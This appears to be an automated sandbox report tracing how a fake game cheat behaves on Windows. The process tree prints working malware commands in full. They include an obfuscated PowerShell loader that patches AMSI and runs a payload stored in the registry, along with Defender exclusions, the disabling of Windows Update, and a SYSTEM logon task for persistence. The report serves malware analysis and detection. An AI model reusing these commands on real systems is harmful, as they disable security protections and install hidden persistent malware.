cmd.exe powershell.exe PID 4340 wrote to memory of 964 4340 svchost.exe conhost.exe PID 4340 wrote to memory of 964 4340 svchost.exe conhost.exe PID 4340 wrote to memory of 964 4340 svchost.exe conhost.exe PID 2252 wrote to memory of 4548 2252 svchost.exe conhost.exe PID 2252 wrote to memory of 4548 2252 svchost.exe conhost.exe PID 2252 wrote to memory of 4548 2252 svchost.exe conhost.exe PID 964 wrote to memory of 4532 964 conhost.exe cmd.exe PID 964 wrote to memory of 4532 964 conhost.exe cmd.exe PID 4548 wrote to memory of 2536 4548 conhost.exe powercfg.exe PID 4548 wrote to memory of 2536 4548 conhost.exe powercfg.exe PID 4532 wrote to memory of 1176 4532 cmd.exe powershell.exe PID 4532 wrote to memory of 1176 4532 cmd.exe powershell.exe PID 2536 wrote to memory of 3976 2536 cmd.exe powershell.exe PID 2536 wrote to memory of 3976 2536 cmd.exe powershell.exe PID 4548 wrote to memory of 2492 4548 conhost.exe cmd.exe PID 4548 wrote to memory of 2492 4548 conhost.exe cmd.exe PID 4548 wrote to memory of 3172 4548 conhost.exe cmd.exe PID 4548 wrote to memory of 3172 4548 conhost.exe cmd.exe PID 4548 wrote to memory of 2220 4548 conhost.exe powercfg.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:584
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:64
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{74e60f7f-82db-452f-b5d2-8071ca161bff}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:760
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:744
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:948
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1056
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1064
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1136
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1184
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3212
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:VZXFYLeyBYxk{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$VbVaylTWkhyhcI,[Parameter(Position=1)][Type]$ojiDHclJxM)$eISNzJnMpls=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$eISNzJnMpls.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$VbVaylTWkhyhcI).SetImplementationFlags('Runtime,Managed');$eISNzJnMpls.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$ojiDHclJxM,$VbVaylTWkhyhcI).SetImplementationFlags('Runtime,Managed');Write-Output $eISNzJnMpls.CreateType();}$MuNGNWmSwyAia=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oRdfZUrKUdIKqu=$MuNGNWmSwyAia.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$rxenVSNfFXpedfldRCR=VZXFYLeyBYxk @([String])([IntPtr]);$YjerJNiDHJWrpznUGBRxPx=VZXFYLeyBYxk @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$SCfaJYBdQbL=$MuNGNWmSwyAia.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$fPYfSfyCDRFCuo=$oRdfZUrKUdIKqu.Invoke($Null,@([Object]$SCfaJYBdQbL,[Object]('Load'+'LibraryA')));$ynDTcuLeipawfdzhi=$oRdfZUrKUdIKqu.Invoke($Null,@([Object]$SCfaJYBdQbL,[Object]('Vir'+'tual'+'Pro'+'tect')));$qtSolFO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fPYfSfyCDRFCuo,$rxenVSNfFXpedfldRCR).Invoke('a'+'m'+'si.dll');$fEpHOsIZMJNZOzTBI=$oRdfZUrKUdIKqu.Invoke($Null,@([Object]$qtSolFO,[Object]('Ams'+'iSc'+'an'+'Buffer')));$iOxEVIfMzX=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ynDTcuLeipawfdzhi,$YjerJNiDHJWrpznUGBRxPx).Invoke($fEpHOsIZMJNZOzTBI,[uint32]8,4,[ref]$iOxEVIfMzX);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$fEpHOsIZMJNZOzTBI,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ynDTcuLeipawfdzhi,$YjerJNiDHJWrpznUGBRxPx).Invoke($fEpHOsIZMJNZOzTBI,[uint32]8,0x20,[ref]$iOxEVIfMzX);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2196 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4816
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JqhVKfZrpkaP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fNUmazMmrQMyGg,[Parameter(Position=1)][Type]$scCxEjwPcF)$KqDzDSMlGNz=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$KqDzDSMlGNz.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$fNUmazMmrQMyGg).SetImplementationFlags('Runtime,Managed');$KqDzDSMlGNz.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$scCxEjwPcF,$fNUmazMmrQMyGg).SetImplementationFlags('Runtime,Managed');Write-Output $KqDzDSMlGNz.CreateType();}$ExMOfZAFEDaIa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$HcvQfcetTKIZYu=$ExMOfZAFEDaIa.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$UmRhDOLJpHkOSeLkjRQ=JqhVKfZrpkaP @([String])([IntPtr]);$BqdweyTDsiBSfPeqwLiVjc=JqhVKfZrpkaP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$WZSgrntmJOa=$ExMOfZAFEDaIa.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$kyWFxHyFxfoZQU=$HcvQfcetTKIZYu.Invoke($Null,@([Object]$WZSgrntmJOa,[Object]('Load'+'LibraryA')));$WrhAZMNXIdEclOnIA=$HcvQfcetTKIZYu.Invoke($Null,@([Object]$WZSgrntmJOa,[Object]('Vir'+'tual'+'Pro'+'tect')));$MAaVVpe=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kyWFxHyFxfoZQU,$UmRhDOLJpHkOSeLkjRQ).Invoke('a'+'m'+'si.dll');$zTxkhFtLPLAbFzmEO=$HcvQfcetTKIZYu.Invoke($Null,@([Object]$MAaVVpe,[Object]('Ams'+'iSc'+'an'+'Buffer')));$YXvruHNoji=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WrhAZMNXIdEclOnIA,$BqdweyTDsiBSfPeqwLiVjc).Invoke($zTxkhFtLPLAbFzmEO,[uint32]8,4,[ref]$YXvruHNoji);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$zTxkhFtLPLAbFzmEO,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WrhAZMNXIdEclOnIA,$BqdweyTDsiBSfPeqwLiVjc).Invoke($zTxkhFtLPLAbFzmEO,[uint32]8,0x20,[ref]$YXvruHNoji);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4328
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1260
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1272
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1348
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1444
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1484
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1496
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:3108
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1624
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1632
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1724
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1788
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1800
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1944
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2012
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2024
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1620
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2088
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2200
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2320
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2400
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2516
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2592
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2608
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2624
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2656
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2836
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3136
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3260
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3436
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3528 -
C:\Users\Admin\AppData\Local\Temp\06293c3726a8b6029225668dcfb8c7e8.exe"C:\Users\Admin\AppData\Local\Temp\06293c3726a8b6029225668dcfb8c7e8.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1384 -
C:\Windows\SysWOW64\cmd.execmd /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Error #103 Cheat cannot start properly because antivirus is not disabled. Please disable antivirus and re-download the cheat.','Error','OK','Error')"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4432 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Error #103 Cheat cannot start properly because antivirus is not disabled. Please disable antivirus and re-download the cheat.','Error','OK','Error')"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1300
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4148 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2768
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Users\Admin\AppData\Local\Temp\svchost.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4340 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"5⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="6⤵
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE6⤵PID:4748
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:2124
-
-
C:\Windows\system32\sc.exesc stop wuauserv7⤵
- Launches sc.exe
PID:1616
-
-
C:\Windows\system32\sc.exesc stop bits7⤵
- Launches sc.exe
PID:228
-
-
C:\Windows\system32\sc.exesc stop dosvc7⤵
- Launches sc.exe
PID:4312
-
-
C:\Windows\system32\sc.exesc stop UsoSvc7⤵
- Launches sc.exe
PID:2056
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc7⤵
- Launches sc.exe
PID:4268
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled7⤵
- Launches sc.exe
PID:3024
-
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""7⤵
- Launches sc.exe
PID:3176
-
-
C:\Windows\system32\sc.exesc config bits start= disabled7⤵
- Launches sc.exe
PID:2696
-
-
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""7⤵
- Launches sc.exe
PID:5216
-
-
C:\Windows\system32\sc.exesc config dosvc start= disabled7⤵
- Launches sc.exe
PID:5272
-
-
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""7⤵
- Launches sc.exe
PID:5360
-
-
C:\Windows\system32\sc.exesc config UsoSvc start= disabled7⤵
- Launches sc.exe
PID:5464
-
-
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""7⤵
- Launches sc.exe
PID:5540
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled7⤵
- Launches sc.exe
PID:5660
-
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""7⤵
- Launches sc.exe
PID:5756
-
-
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5852
-
-
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5948
-
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f7⤵PID:6116
-
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f7⤵PID:5024
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f7⤵PID:2936
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f7⤵PID:1364
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f7⤵PID:4004
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f7⤵PID:228
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE7⤵PID:4676
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE7⤵PID:5292
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE7⤵PID:5416
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE7⤵PID:1108
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE7⤵PID:4600
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE7⤵PID:5360
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE7⤵PID:4384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 06⤵
- Power Settings
PID:4992 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:100
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2536
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3232
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe6⤵
- Drops file in Windows directory
PID:3088
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"6⤵PID:3200
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"7⤵
- Scheduled Task/Job: Scheduled Task
PID:3620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"6⤵PID:4432
-
C:\Users\Admin\Chrome\updater.exeC:\Users\Admin\Chrome\updater.exe7⤵
- Executes dropped EXE
PID:4468 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Chrome\updater.exe"8⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
PID:2684 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="9⤵PID:32
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Suspicious use of SetWindowsHookEx
PID:5280
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="10⤵
- Suspicious use of AdjustPrivilegeToken
PID:3232
-
-
-
